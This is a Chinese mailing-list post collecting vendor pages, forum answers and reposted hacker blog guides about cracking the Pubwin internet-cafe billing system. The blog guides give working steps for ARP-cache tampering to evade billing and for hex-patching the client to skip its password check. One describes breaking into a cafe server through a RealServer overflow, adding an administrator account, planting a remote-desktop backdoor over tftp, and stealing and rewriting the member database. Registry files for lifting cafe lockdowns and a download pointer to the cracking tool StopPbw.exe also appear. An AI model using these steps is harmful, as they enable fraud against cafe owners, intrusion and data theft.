Re: 网吧监控桌面程序标题栏

3 views
Skip to first unread message

wanghx

unread,
Jun 1, 2009, 8:44:31 AM6/1/09
to lih...@googlegroups.com
http://www.hintsoft.com.cn/jjfa_2007_cpjs.html
产品介绍
Pubwin 2007

与公安、文化监控系统的整合:与国内大部分公安与文化监控软件实现了无缝衔接。

http://www.hintsoft.com.cn/news/news_20080801.html
Pubwin2007版本,请点击:

  >> Pubwin2007服务
  >> Pubwin2007控制台
  >> Pubwin2007客户端
  >> Pubwin2007服务升级包
  >> 第三方接口代理 (过滤王5.0新版本接口)
  >> Pubwin2007安装使用说明书
  >> Pubwin2007数据库转换工具

过滤王版本
  >> 过滤王核心
  >> 过滤王控制台

http://www.hintsoft.com.cn/ptsb.htm
配套设备

    Mifare卡读写器
    ID卡读卡器
    指纹阅读器
    磁卡/条码卡阅读器
    收银微型打印机
    扫描枪
用于读取商品条形码
    第二代身份证阅读器

http://virscan.org/report/375d385a0e952d72bb09725b0026ce56.html
File information
File Name :   PubwinClient.rar
File Size :   4917168 byte
File Type :   RAR archive data, v1d, os
MD5 :   bc529c6525fc78117ca6f7eab58af448
SHA1 :   83981853ea45644a20e642a76e20f0065cfb5eae
Scanner results
Scanner results :   44% Scanner(16/36) found malware!
Time :   2008/05/30 09:00:58 (CEST)
Scanner  Engine Ver Sig Ver Sig Date Scan result Time
a-squared 3.5.0.18 2008.05.29 2008-05-29
Trojan-Dropper.Win32.Agent.adn
4.542
AhnLab V3 2008.05.30.01 2008.05.30 2008-05-30
-
2.095
AntiVir 7.8.0.24 7.0.4.113 2008-05-29
-
10.406
Arcavir 1.0.4 200805281845 2008-05-28
Trojan.Flystudio.Ab
4.974
AVAST! 1.0.8 080529-1 2008-05-29
Win32:Getos [Trj]
9.292
AVG 7.5.51.442 269.24.4/1473 2008-05-29
-
2.545
BitDefender 7.60825.1254356 7.19245 2008-05-30
Backdoor.Hupigon.ESR
5.918
CA (VET) 9.0.0.143 31.4.5834 2008-05-30
-
6.833
ClamAV 0.93 7287 2008-05-30
PUA.Packed.nPack-3
0.119
Comodo 2.11 2.0.0.540 2008-05-30
Trojan-Downloader.Win32.Delf.bq
1.204
CP Secure 1.1.0.715 2008.05.30 2008-05-30
BackDoor.W32.MeteorBot.17
15.988
Dr.Web 4.44.0.9170 2008.05.29 2008-05-29
Trojan.MulDrop.7416
17.573
ewido 4.0.0.2 2008.05.29 2008-05-29
Dropper.Delf.jz
3.559
F-Prot 4.4.1.52 20080529 2008-05-29
W32/Backdoor.AYIX (exact)
5.090
F-Secure 5.51.6100 2008.05.30.01 2008-05-30
-
4.410
Fortinet 2.81-3.11 9.143 2008-05-29
-
2.549
Ikarus T3.1.01.26 2008.05.30.70839 2008-05-30
Backdoor.Win32.Hupigon.esr
7.186
JiangMin 11.0.706 2008.05.28 2008-05-28
-
4.248
Kaspersky 5.5.10 2008.05.29 2008-05-29
-
26.057
KingSoft 2008.1.14.15 2008.5.30.10 2008-05-30
Win32.Hack.Huigezi.w.371604
1.852
McAfee 5.2.00 5306 2008-05-29
-
9.890
Microsoft 1.3520 2008.05.29 2008-05-29
TrojanDropper:Win32/Hupigon.UC
10.993
mks_vir 2.01 2008.05.28 2008-05-28
-
10.951
Norman 5.92.08 5.92.00 2008-05-29
-
12.006
nProtect 2008-05-29.00 1528313 2008-05-29
Backdoor.Hupigon.ESR
12.574
Panda 9.04.03.0001 2008.05.27 2008-05-27
-
10.750
Prevx V2 20080530 2008-05-30
-
16.147
Quick Heal 9.00 2008.05.29 2008-05-29
-
0.450
Rising 20.0 20.46.40.00 2008-05-30
-
2.315
Sophos 2.74.1 4.30 2008-05-30
Mal/Emogen-I
10.995
Symantec 1.3.0.24 20080528.002 2008-05-28
-
0.813
The Hacker 6.2.92 v00325 2008-05-29
-
11.342
Trend Micro 8.700-1004 5.308.03 2008-05-28
-
0.000
VBA32 3.12.6.6 20080529.2155 2008-05-29
Trojan.BAT.KillAV.df
10.338
ViRobot 20080529 2008.05.29 2008-05-29
-
0.953
VirusBuster 4.3.19:9 9.130.8/11.0 2008-05-29
-
17.841
NOTICE: It may be false positive by some scanners when they found a malware, so you should judge it by yourself.

http://www.hintsoft.com.cn/news/news_20070808.html
Pubwin 2007服务器安全设置公告

由于部分网吧在安装PUBWIN服务器后没有做安全设置导致网吧服务器数据库被人恶意入侵,修改网吧设置和会员余额给网吧造成不小的损失。本文将介绍方法 来防止此类事情发生。

http://www.hintsoft.com.cn/news/news_20070905.html
三.客户端的防破解方法。
因为目前的破解手段大多分为3大类:1、软件自身的bug 2、工具破解(如防火墙)3、arp的破解

目前禁止的已知“非法程序”有:StopPbw.exe、EP.exe、赤月外挂、金山网镖等。

3、arp的破解:其原理是手工隔断服务器连接来破解,在客户端安装了LockARP后, 即可防止这种破解手段,同时最新的pav.dat文 件中也禁止了arp.exe的使用,如果您需要使用ARP命令,可以使用去 掉arp的pav.dat
对于当前pubwin不能禁止的破解工具,您一旦发现请立刻与我们联系,当然最好能够保存到破解工具,然 后使用邮箱附件的方式把它发送到tu...@hintsoft.com.cn,我们接受到后,会马上确认并公布防止方法,详 情点击

http://z.baidu.com/question/31921705.html
请熟悉pubwin的来回答
 悬赏分:200 - 解决时间:2007-8-7 12:32
现在pubwin可算是一个比较好的网吧管理软件,但它仍存在一些漏洞,一些用户通过破解它来免费上网,比如用StopPbw.exe就可以退出 pubwin客户端程序,从而脱离管理主机的控制,达到免费上网的目的。请问,使用StopPbw.exe后在管理主机上有什么现象和反应?网管怎样知道 用户在用StopPbw.exe?

最佳答案
PubWin EP2007版本以下都不能检测到StopPbw.exe的存在,管理端也不会显示非法,显示的是关机状态!但显示其有进程存在,也可以关闭该计算 机!!!网管没事的时候在管理端选中关机状态且有进程存在的机器,关闭即可!如果那厮要搞,就必须用卡先打开机器才能搞!!如果你发现其有可疑在搞鬼!那 么你关闭他的机器是轻而易举的事情!这样关那么2次,他也不会再弄了,除非那人有神经病!!!呵呵!不知道回答的你是否满意?

http://wenwen.soso.com/z/q58550314.htm
你说的软件是破解EP的吧,呵呵,我自己也用过,
没有的话去这下载waxwing.ys168.com
happy-ep.exe 451KB
在娱乐工具---破解专区里。
相关资料还可以看看这
http://www.netbarghost.com/
这里的软件更先进一些吧,
Pubwin2007破解伪装完美版[080403]
看,↗,4月3号出的,你打开网站就看的见了。

我继续补充一下。你这样做不对,你直接开机输入卡号密码之后用stopPbw,这样吧台会显示开机锁定状态。

你说的软件是破解EP的吧,
没有的话去这下载waxwing.ys168.com

http://bbs.54master.com/archiver/tid-189667.html
三、Pubwin计费系统客户端被破解的现象非常严重,且破解方法较为简单,浩艺方面一直无计可施,下面列出比较普遍的几种破解方法:5k N5t v B
1.在系统刚启动后,但未锁屏锁鼠标时,同时按下Ctrl+Alt+Delete三键,在系统的“任务管理器中”停止Pubwin的进程后,即可不受限制 的上机;Z j1\(@    t6U%] a d
2.利用StopPbw.exe程序破解,该软件在网上可随意下载,运行后自动搜索Pubwin2007客户端进程,并进行屏蔽,计费服务端无法控制,且 不会将该机自动锁屏或重启。

http://bbs.21yy.com.cn/thread-1075-1-1.html
pubwin2007下载地址 for 过滤王
pubwin2007 for 过滤王(云南等地区使用)

Pubwin2007-- 2009.03.12 “云南大理地区”--------用户下载

http://www.cdqx.cn/flzx/rjxz2.htm

网吧相关软件下载

任子行软件安装说明下载    压缩工具winrar

省中心IP为: 218.12.35.168 市中心IP:218.11.132.30

服务电话: 2994997,3198428,13603349564

任子行审计管理软件

审计服务端6.0 build57 网吧审计服务端sj60.rar (50.5M)
审计客户端6.0 build57 网吧审计客户端dlsj.rar (154k)
微软程序包 build57 微软程序包wr.rar (2.5m)
visual c++ 错误修正程序包 build57 错误修正程序包yx.rar (3k)
windows intaller下载

 

indows intaller3.1下载 (2.41m)

任子行实名插件

实名插件21 build21 支持Pubwin,万象2004 (19M)
实名插件21补丁 build21 补丁 build21补丁解决非会员 不要密码 (103K)
实名插件29 build29 支持万象2008 (33M)
         

网吧计费管理软件--Pubwin

Pubwin2007后 台数据库程序 v2007 PubwinServer.rar (137M)
Pubwin2007后 台数据库升级包 v2007 serverupdate.rar (37M)
Pubwin2007前 台收银端程序

v2007

Pubwin前台.rar (24.4M)

Pubwin同步代理 v2007 Pubwin同步代理.rar (12.6M)
Pubwin2007客 户端程序 v2007 PubwinClient.rar (27.7M)
Pubwin7工具 v2007 PubwinTools.rar (32.5M)
万象20004到 2007的转换工具 v2007 万象转换工具和说明.rar (3M)
Pubwin7安装视屏 v2007 Pubwin7安装视屏 (40M)
Pubwin4服务器端 程序

v4.0

Pubsrv.rar (14.3M)

Pubwin4客户端程 序 v4.0 Pubclt.rar (1.59M)
Pubwin4注册工具   retool.exe (86K)

网吧计费管理软件--万象

万象850服务端安装程 序

 

万象服务端850.exe (3.81M)

客户端安装程序

 

万象WIN2000客户端 (2004版) (4M)


 

万象98客户端850.exe (4.13M)

ADO2.6数据库引擎

 

mdac_typ_2.6_cn.exe (5.01M)

网吧培训材料

网吧培训

 

wbpx.rar (1.29M)

清卡工具

 

网吧清卡工具及说明.rar (1.75M)

游戏

 

游戏介绍


网吧联盟- 软件技术:Pubwin EP掀起网吧管理风暴


日前,上海新 浩艺软件有限公司隆重发布了新一代企业级网吧管理系统Pubwin EP,新 ... 在接受记者采访时,新 浩艺公司Pubwin EP产品经理孙恃静先生认为:“作为我公司即将 ...
www.pywbxh.com/infoshow.asp?Tid=4&id=173

新 浩艺转型突围_财经_深圳新闻网

2009年5月19日 ... 李大鹏2004年5月加入上海新 浩艺软件有限公司(下称“新 浩艺”)担任副总经理时,这家以网吧管理软件PUBWIN起 家的企业市场占有率已达到50%左右。 ...
big5.sznews.com/finance/content/2009-05/19/content_3777382.htm

http://blog.sina.com.cn/pubwin
玩★pubwin☆的人|[P.P.R]

http://blog.sina.com.cn/s/blog_4c31c7950100097m.html
网吧破解之高手篇(2007-04-21 06:04:54)
标签:黑客 pubwin 破解 网管 pubwin2007     分类:I am 黑客
网吧破解之高手篇一
 
 做网管几个月了,总算是有些心得了。现在和大家研究网吧系统的破解中的最核心的部分吧。现在的网吧不管用是的哪种管理系统如:美萍、万象、PUBWIN 等还是现在管理相对容易的IP卡系统都是有很多漏洞的。
以我的推理就是,我们所用的管理系统都是先安装了一个服务端,来控制所有的客户端机子的,也就是说别人上网的机子上都已经安装了被你控制的程序。首先说明 他们虽然是受服务端的管制,而服务端只是控制他们上机收费、计费和决定谁有上机权限而也,客户机其它的连接是正常的,我想说的就是他们一开机就已经连通了 路由与Internet是通的。(地球人都知道..呵呵)
如果有人在客户机用他们的合法帐号登陆了,他就获得了使用机器的权限,此时他删除了管理软件,我们就失去了和客户机的管理而无法扣费了,他就免费的上机 了。当然现在的网吧管理系统并不是那么好破掉这个东西的,不好破解不代表破解不了。
只要是客户端阻止了与服务器的通信。那么他就不受我们的管理了。他就可以免费上网了呀!他们不用花尽心思来破解我们的管理系统。他们只需拒绝服务端的命 令,我们就算是崩溃。想想我们都无法和他们那里通讯,又如何计费了。
我所在的网吧是IC卡管理系统的,IC卡系统对于大家来说应该也不是太陌生吧,顾客上网是通过办理IC卡上网的,IC卡上的金额是由安装在主机上面的读卡 器来扣费的与服务端没什么联系,即使与服务端断开了连接也会自动扣费的,但这并不意味着IC卡就完善无缺,慢慢听我分析:IC卡系统还有一种卡就是通宵 卡,这种卡上面的金额是无限的,对于读卡器来说,他是不会扣点的,只有服务端来判断这张卡是否已经过期来决定此卡能否用。如果服务端失去和那台客户机的连 接时,读卡器只知道上面有金额就给予上机权限!在服务端只能是显示此机连接中断,意思就是说是空机。但那里是有人在上的。这就是我所说的与服务端的通讯中 断哦,读卡器检测到有金额就能上,挂失卡和过期通宵卡就都能用了,那么网吧就真的要关门了。要修补这些漏洞我想是很难的了,因为我们不能失去与客户机的联 系的。
我已经用这种方法破解掉了这种IC系统了,我所用的IC通宵卡是天天都能上的,服务端是无法管理我的,他想关我机都没办法,呵呵,不过我是守法的好公民。 我不会这样做的,只是偶而玩玩罢了。希望你们能注意到这个问题的严重性,现在阻止局域网通信的软件大把。不要以为你的网吧什么都已经补好了就不存在漏洞 了。
网吧破解高手篇二
继上篇《网吧破解高手篇》之后,公布具体破解方法和原理及步骤:
首先要针对网吧组建,要满足我们的条件?(什么网吧要满足我们条件,晕陈同学你急什么-_-!)
首先我们要了解网吧没有把主机和路由合为一体,以前的网吧都是那样组建的,不过现在应该没几家那么垃圾的网吧了。其次是我们要知道是由主机网络扣费的(不 像IC系统读卡器扣费)。这些条件其实现在的网吧差不多是都是符合的,除非你到了一家90年代的网吧,那么大哥你可以跳过这篇浅谈。
好了大家了解了吧,现在我们就开始吧:
对了,忘了一点就是人也要条件――就是你不要太莱,至少懂得基本的网络命令.
Let's GO~!!!
首行当然要取得上机权了,用你们的帐号登陆上去了,要不然怎么做。
要明白我们目的,用句黑客语:黑掉主机,让他在能正常工作又找不到我们,但我们可以跟路由通信!
好了,找出路由和主机的IP。
1:打开运行,不要说运行被禁用掉了,那手工破吧,那个低级的破解就不在此介绍。
键入:cmd,系统不一样,命令不一样只要进去了DOS就行了,我知道你们明白我说的DOS
再次键入:netstat -r
之后我们可以看到最后个路由信息,什么找不到就是这行:
Default Gateway:192.168.*.*了解了吧。知道他是路由IP了,好的不要动它,记下IP!
2.再次进入DOS,输入arp -a 那么你就会看到一个刚才与路由IP一样的数字,还有其它的IP与MAC对应的地址,如果你只能看到一排数字,那么你没戏了。在没有其它机器干扰的情况,一 般是两个IP号对应相应的MAC。如果有三个的话那么可能是有FTP服务器,不管有同个关键要找到主机IP。
什么不会找,我无语了。如果真分不出,只能用我的绝招:宁可错杀一百也不放过一个。除了路由IP其它的一会儿全部用我的方法阻止,如果你断开了与电影服务 器通信的话。哎,你是不能看电影了哦。
3:关键:围绕着我们的中心出发。既然找到了主机IP,嗯。。到这一部只是才找到了主机的IP,其实你也可以请网管哥哥吃个糖让他告诉你的,不过我喜欢自 己找。反正成功才是硬道理。如何让主机与我们(客户机)中断,这才是最大的问题,用软件?我之前尝试了几款局域网至命软件《局域网终结者》、《网络执法 官》等都不行了,不过《网络执法官》可以阻止任意两台主机之间的通信,这点不错。也可以根据这点来完成我们中断的目的。阻止我们想要客户机和主机通信就行 了,《网络执法官》上面操作很简单。但是《网络执法官》是阻止不了本机与主机通信,那样就是只帮其它客户机中断了,而帮不到自己。难道你你愿意做一个菩萨 帮助人家免费上网吗?自己上网却要花钱,不爽吧,《网络执法官》而且是一个收费版,测试版的才可以用30分钟。占用系统资源不说,又易被发觉。
之后本人又发现一种破解方法(结束mprexe.exe进程)在98下可以直拉结束,其它操作系统关联到ddl文件需要更深了讲解,这种方法也可以起到确 解作用,不过在这里不作太多解释。因为:我所阐述的是原理网络破解,要适合所有网吧嘛。
那么根据什么才可以让主机与我们断开,开始我想着去破解《网络执法官》,可惜学术不精败矣!网上又找不到破解版,其实也没有去仔细的找。那么就没有办法了 吗?后来只好去找《网络执法官》的攻击代码和原理。
一个月之后没有消息,不过学到的不少。终于明白根据ARP来欺骗主机,让主机找不到我们,那么开始做吧。
如何欺骗呢,几个月来的研究:通过了解了arp协议,互联网N多协议,利用硬件地址欺骗大法,如果你不懂,到这里你会很含糊,不怪嘛这是高手篇,不是搞什 么漏洞,找什么热键!只要跟着我的步骤来也行的。
通过修改MAC地址,到底怎么更改MAC地址了,看了N多文章后才原白其实MAC是改不掉的,好失败!当初是想欺骗主机修改MAC让主机找不到们,可是他 是网络另一端的,就算给我们改也提供不了改的方法。
    后来我的灵感来了,通过钻研ARP协议之后的发现,我们可以自己欺骗自己来找不到主机,为什么要这样做。你晕了吧,听我把整个流程讲给你听:你以为网吧的 主机天天像扫描机一样扫哪些机子是开着的,那样来管理客户机呀,不对你错了。其实是当我们一开机时,安装在客户机的程序会自动连接网吧主机。
    举例:假设网吧主机是B,客户机A。(客户机A,启动后主动连接并告诉主机B:老大我开机了请指示;主机B:好的,请问有没有用户登陆,没有的话我就不验 证帐号了,你在3分钟后自己关机吧。电费很贵的知道吗?客户机A:明白有人上机了再通知你!)这样滴,明白吧了欺骗自己一样可以阻止通信。因为他们的通信 是由客户机主动提交的,明白了吧。
    那么又要怎么欺骗自己了,好了大家知道了原理,我就说出这么久的研究吧:我们可以强行更改主机在我们客户机里的ARP缓存表,同样可以达到网络中断。这样 做是让客户机找不到主机A,呵呵不懂?你去看看ARP欺骗原理吧。
刚才我不是叫你们苦心找出主机IP吗?
现在我们不用利用其它软件了,跟着我来打几个命令吧:
arp -a 找到主机对应的MAC地址。
arp -s 加主机IP 照上面输入MAC地址。
如00-00-00-00-00-00但要故意输错一位,为什么?欺骗自己嘛。现在大功告成,主机与我通信中断了,扣不到费了。不是所有网吧都有用,我希 望你们能掌握原理,那就会无所不能了。还有的细节在这里说也不清楚,你们应该懂了吧。网络破解至此结束。
希望大家能掌握好原理,方法很多。知道吗?在XP系统上此方法对为最简单!
备注:如果你是XP那么可以行,如果你的是2000就不行,需要我的一段好简单的死代码,不懂的请来电至群,98系统我没有试过。
由于能力有限有误之处尽请谅解;本文只提供技术交流,并不允许利用所提供的知识做非法活动!
                                                                                                                       [BY BeautifulBoy]

http://blog.sina.com.cn/s/blog_4c31c7950100097h.html

找出Pubwin4密码的另类方 法(2007-04-21 05:42:59)
如果是今天你遇到pubwin4,我一定推荐你用pubwin破解精灵,真是利器啊~不过当时本 文的思路还是很值得肯定的!
    好开始了`~~道先~进入pubwin的默认路径C:Program FilesHintsoft~把它所在的那个文件夹Pubclt复制一份出来,到别有盘下~~~然后~把原来的那个C:Program FilesHintsoftPubclt下的pubwn.exe改名~~什么名字都是可以了(~目的是~非法关了pubwin4之后~~系统找不到它的名 称,~然后开不了~~)

    去下载"Ultraedit32"和"密码查看器",用Ultraedit打开,刚才复制的那个Pubclt下的那个pubwin.exe,查找 “85C07509”将其改为“85C09090”再查找下一个,再改为“85C09090”~然后将其保存为 “Pubwin.exe”和另为“pubwin.pub”即可~说明(保存在复制的那个Pubclt文件夹下)

    接着对任务栏下面的那个红色图标也就是pubwin点左健~选"发短消息"~然后换成智能输入法~相信这个谁都会用~按"V"+向上健+DEL+两次回 车~~OK~~关了那个pubwin4~~(事实上使用结束pubwin的进程树更为合理)这时~进去我们之前改的Pubclt文件夹里面的~打开我们改 过的pubwin.exe~~OK~~点管理工具->系统设置,它会叫你输入密码~~直接点"确定",呵,可以跳过它,进入系统设置,里面有密码

打开之密码查看器,拖那个放大镜密码上面

完成. (By TrEeHaCk)

显然“98FDCE7B338C35480C0766C51ED0B74A”是MD5,呵呵,跑吧。。。

http://blog.sina.com.cn/s/blog_4c31c7950100097b.html
我是这样入侵网吧服务器的...(2007-04-21 05:35:08)
标签:pubwin2007 pubwinep 黑客 网管 冲值 破解 pubwin     分类:I am 黑客
 
本文正如作者所说没有什么技术性可言,仅供一些人参考。
        一直有写些东西的冲动,只是太懒,从前写些在网吧免费上网的东东,现在想想是该换些别的。有些东西放了太久很容易过时的。本文所提及的工具都可以在网上找 到。
一、确定目标
  首先要确定要攻击的目标,即网吧服务器的IP是多少。我所在网吧的客户机装的是Windows 98+万象2003,估计服务器应该是Windows 2k以上,用Superscan 3.0扫了一下192.168.0.1~192.168.0.254(内部IP)这个范围的135端口,只有一个结果,往服务台瞅了一眼,确实只有一台服 务器没有错,目标已经确定。
二、开始入侵
        既然服务器开了135端口,那么先用RPC服务缓冲区溢出漏洞溢出工具“RPC Exploit GUI”试试看,选择目标为win2k(ALL)和winxp(ALL)都没有成功,或许是打了补丁,也可能是借助天网防火墙之类的对135端口做了限 制。
        打开Superscan(本人所用的是3.0版,功能都差不多),扫了一下192.168.0.100(刚才扫出的服务器内部IP地址)的“1~500” 端口结果显示服务器开了21(ftp),80(http),135(DCE endpoint resolution),139(NetBIos),445(Microsoft-DS)端口,在IE地址栏内输入<ftp: //192.168.0.100>;(回车)有个共享目录Backup,打开浏览了一遍,东西挺多,只是有个万象2003的安装程序让我不至于太失 望。返回Superscan,可以看到结果栏里显示服务器用的是IIS5.1可以确定目标服务器用的是Windows XP,看来用Webdavx溢出XP的机子是没希望了,用X-scan扫描服务器网页,报告发现.idq/.ida映射的溢出漏洞。骗人的。其实对于 IIS5.1无效,想过利用X-way穷举目标服务器的密码。但是很费时,我没有太多时间,便放弃了。又试着对服务器的fp30reg.dll进行溢出。 由于对方防火墙的阻挡,测试失败。Win98的客户机实在不能利用目标服务器的139端口做什么。用“RPC Exploit GUI”溢出服务器的139、445端口的成功率太低。没什么法子,满着看目标服务器的网站做的如何,随便点了一会儿,是利RealOne播放的在线电影 网站,想起来了,real服务不是开了个554(媒体流)端口嘛!刚才用Superscan扫时忘了,现在补充确认一下。再用real服务缓冲区溢出漏洞 溢出工具“THCREALbad”试试。这个漏洞不是很著名,管理员或许并不知道,我心里想着,一会儿,提示溢出成功,并要求我连接到其31337端口, 我终于看到了曙光,telnet上去,成功得到服务器的shell。先做个账号,这要用到几条命令:(括号内为注解,不要输入)
  net user guest/active:yes(启用账户guest)
  net user guest 12345(把账户guest的密码设为12345)
  net localgroup administrators /add guest(把guest加到administrators组,具有最高权限,默认为Guests组)
        由于服务器用的是WinXP,因此映射网络驱动器的方法是不行了,下载TFTPD32并运行(自己去网上找),把本地变成一台FTP服务器,FTP目录设 为C盘根目录,下载djxyxs.exe(开3389用的)到C盘根目录(FTP目录设在哪里就下载到哪里)。回到溢出的shell,把djxyxs传到 服务器,执行“tftpt -i 192.168.0.50 get djxyxs.exe C:windowssystemdjxyxs.exe(注:192.168.0.50为我所在机),传过来了,再执行“djxyxs”程序,对方的 3389端口就要开了(还要重启),后门制作好了以后,来窃取服务器的会员数据库,服务端一般是被装在C盘或D盘的Octopus目录下,执行“tftp -i 192.168.0.50 put Oct2003.mdb c:octopusOct2003.mdb”(注:Oct2003.mdb为万象2003的会员数据库),一盏茶的功夫(视数据库的大小而定)数据库下载 过来了,但是怎么打开呢?可以用Excel,但网吧里不会装这种玩意,记得服务器的共享目录Backup里有个万象2003的安装程序(在“百度”搜索 “万象2003”可以找到),把它的服务端装到本机D盘根目录,用刚刚下载到C盘的Oct2003.mdb覆盖掉本机“D:Octopus”目录里的空数 据库文件,再运行服务端程序“server.exe”可以看到本网吧的所有会员,接下来是自己添加会员,没什么好说的,可别告诉我你不会。再着是要把修改 后的数据库文件传回来,由于服务器的服务端是开着的,为避免发生冲突,切不可把修改过的数据库文件直接传到目标的Octopus目录,要换一种方法让服务 器在重新启动过程中替换掉那两个文件,方法如下:
1、编辑本机的autoexec.bat(在C盘的根目录),删掉所有内容。
2、输入以下内容:(括号内为解释,不要输入)
@echo off(关闭屏幕回显)
move c:Oct2003.mdb c:Octopus(将本机C盘的数据库文件替换掉服务器里的数据库文件)
3、回到服务器的shell,执行“tftp -i 192.168.0.50 get autoexec.bat c:autoexec.bat”(用我们的自启动文件autoexec.bat覆盖掉服务器的autoexec.bat)。
4、最后是把修改过的数据库文件传到服务器,执行“tftp -i 192.168.0.50 get Oct2003.mdb c:Oct2003.mdb”
         接下来只需叫管理员把服务器重启一下就可以了(呵呵!管理员会听你的吗?)。XP自带一个重启的命令(Shutdown),我在溢出的shell里执行 “shutdown -r”后,提示“权限不够,客户机不能执行重启命令”,算了吧!心急的可以来个拒绝服务攻击。本篇写的确实挺乱的,没有什么技术性可言,仅供一些人参考。

http://blog.sina.com.cn/s/blog_4c31c79501000973.html
网吧十大绝对漏洞爆光(2007-04-21 05:24:43)
标签:pubwin2007 pubwinep 黑客 网管 冲值 破解 pubwin     分类:I am 黑客
 
    上网吧的人多了,管理也难了,于是网吧管理软件也来了。网管软件来了,于是网管就轻松了,每天打开电脑,启动软件,仿佛也就没事了。不过真是这样吗?也许 只是轻点几下鼠标,就会找到几个漏洞,网管软件也就如玻璃般的碎掉。不信?
  现在网吧的管理员大多使用诸如《美萍》之类的网吧管理软件来管理系统,同时还通过修改系统注册表的方法来禁止用户进行诸如删除文件、修改参数的危险操 作。但在没有使用任何工具软件的前提下,以一些简单的方法就轻易突破了网吧管理软件的限制,原本被禁止的系统功能全部复活,不仅可以删除文件,还可以对系 统注册表进行随意修改,整个系统可任意使唤。这次,我们将在网吧发现的十大致命漏洞全部曝光,以此警示每一位网吧管理员。
  
    一、IE菜单漏洞
  找回菜单 轻松
  微软老大的补丁越打越多,这样,倒不是说比尔大叔的漏洞越来越多了,而是正应了那句“上有政策,下有对策”,网管软件在旧版本中的屏蔽IE中的文件和 工具菜单的漏洞有一大箩筐,新版本的漏洞就不那么容易发现了,不过,请看……
  探秘欲望度:★★★★★
  探秘难度:★★★☆☆
  探秘方法:这次我们需要再次用到快捷键,这次轮到“Win+D”了,刷新桌面,在《美萍》下的桌面实际是美萍指定的一个目录,而原桌面则被隐藏了,刷 新是对原桌面的刷新,只要你不切换其他窗口,我的电脑等将会一直存在于桌面之上。你要做的是:打开我的电脑,然后再点工具栏中的“向上”,就可以把桌面以 窗口的形式打开了(因为硬盘是被屏蔽掉的,当我们打开我的电脑时将什么都看不见),此时你要做的是新建一个文本文档,输入这么几行:
??
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrent VersionExplorer]??
″NoFavoritesMenu″=dword??00000000
  另存为任意文件名后缀为“.reg”的文件就可以了,之后你要做的就是导入它,等你再次开机时打开我的电脑就会看见那可爱的被网管软件屏蔽IE中的文 件和工具菜单啦。
  二、本地硬盘漏洞
  给硬盘解锁 小菜
  上网者最苦大仇深的莫过于不能使用硬盘了,不说那些很伤心的故事了,就说你要下载个什么“小小六号”过过侠客瘾,可你下载的文件放哪儿?下面这招解锁 方法就这样出笼了。
  探秘欲望度:★★★★★
  探秘难度:★★★☆☆
  探秘方法:见过报上的寻人启事吗?见过,不就是查找吗?丢的人不一定找得到,硬盘却是绝对可以找回来的。网吧老板们大都因为屏蔽了硬盘而对热键大开绿 灯。其原因也是再简单不过的了,因为你在搜索栏内找不到本地硬盘,如果你选择我的电脑来进行“查找”??快捷键是用“WIN+F”键啦,如 “Command”等的文件时一定会被告知“找不到”。但其实不然,在搜索栏中输入“C:”回车后,找到的可就是一大堆的东西了。
  这样一来,又可以对本地硬盘进行访问了。当然还有一些人通过操作系统与IE高度结合的漏洞:打开IE浏览器后,在地址栏中直接输入“C:”后按“回 车”键也可以察看硬盘中的资源,但这是一种是较古老的方法了。
  这里的关键就是如何访问到本地硬盘,一旦进入了本地硬盘,对于一个熟悉Windows系统的用户来说,一台完整的电脑就在面前了。
  三、程序运行漏洞
  禁止运行 没门
  用惯电脑的人都知道,在开始菜单里面有一个很重要的程序,那就是运行程序了,有了这个程序我们可以运行我们想用到的其它程序,而进一步实现电脑的操 作。但是在网吧上网的时候,当然就没有那么好的事情了,网吧老板们总喜欢安装一些网管软件来阻止我们的使用,唉,真没办法,在这种情况下,我们就只能另找 门路啦!于是,绕过马奇诺防线的方法出现了。
  探秘欲望度:★★★☆☆
  探秘难度:★★★☆☆
  其实方法真的很简单哦,在我们所提到的其它漏洞方法中已经提到过了的,当然就是修改注册表了,只是其中的参数不同而已,当然改成运行的那个参数不就行 了吗?这里我们用导入的方法进行修改。先打开一个记事本,在上面输入:
REGEDIT4
[HKEY_CURRENT_USERSoftware
MicrosoftWindowsCurrentVersion
PoliciesExplorer]??
″NoRun″=dword??00000000
  然后保存为“.reg”文件或保存为“.txt”文件后将扩展名改为“.reg”,再执行该文件即可。就这么简单搞定,方便快捷。
  四、资源管理器漏洞
  解放管理器 有戏
  资源管理器,想必每一个电脑的使用者都应该知道吧,它的作用当然就是让我们更方便地操作电脑里的全部内容,但一些网吧老板却不提供这些方便给我们。不 过要想在网吧操作自如,也不是太难!
  探秘欲望度:★★★★☆
  探秘难度:★★★☆☆
  探秘方法:网吧的电脑什么都可以没有,当然就不能没有QQ和IE啦,好的,那我们就从IE下手吧。通过IE查看文件夹,这种方法非常直接有效。首先打 开一个IE,拉出“查看”下拉菜单,选择“浏览器”中的“文件夹”选项。
  这时,主窗口左侧出现资源管理器的窗口,内有我的电脑树形目录结构。这时用户可以根据自己的需要一层层地展开,寻找自己所需的东东了。
  五、鼠标右键漏洞
  挡住右键菜单 没戏
  网页上有那么多漂亮的图片或者自己众里寻他千百度的资料,可兴冲冲地点击右键想把它保存下来,却发现右键根本不能用,你的感觉是不是七窍冒烟啦。也许 正是这个原因才让人发现了这个漏洞。
  探秘欲望度:★★★☆☆
  探秘难度:★★☆☆☆
  探秘方法:屏蔽鼠标右键菜单后,不能新建文件。此时网吧里常用《超级兔子》中的“安全限制全选”+“屏蔽本地硬盘”+《美萍》来实现的(网吧中最流行 的管理软件一般是《美萍》,本系列如果没有特别说明都是在《美萍》下的操作),但这也是挡不住的!在网页中遇到禁用右键的情况我们有许多办法来解决,其实 这些方法中有的也能移植到操作系统中的。就介绍最常用的也最有效的一种方法吧:在需要操作的文件或快捷图标上先点住右键不放,再点下左键,然后松开左键, 最后松开右键,这时熟悉的右键菜单便呈现在眼前了。另外还有一招更普通,用鼠标左键单击选中文件,同时按住“Shift+F10”键,即可在资源管理器中 显示出鼠标的右键菜单。
六、下载漏洞
  突破下载封锁 不难
  网络诱惑何其多呀,比如美眉图片、搞笑程序,哪个不想拉下来到本地的机子里瞅瞅呀,
可在网管软件下,下载却不成,不用着急的,接着再看……
  探秘欲望度:★★★★★
  探秘难度:★★★☆☆
  探秘方法:虽然标榜探秘难度为三星级,但只要能利用前面提到的访问硬盘的
漏洞以及IE中的文件和工具菜单的漏洞,下面这招就只是水到渠成了。当能访问硬盘以后,
通过“C:windowsstart menu”中的快捷方式,你可以自由地使用系统
的“开始”菜单启动下载程序,或者直接进入下载软件目录启动下载程序,
这样就可以不怕IE的下载限制而进行下载了。
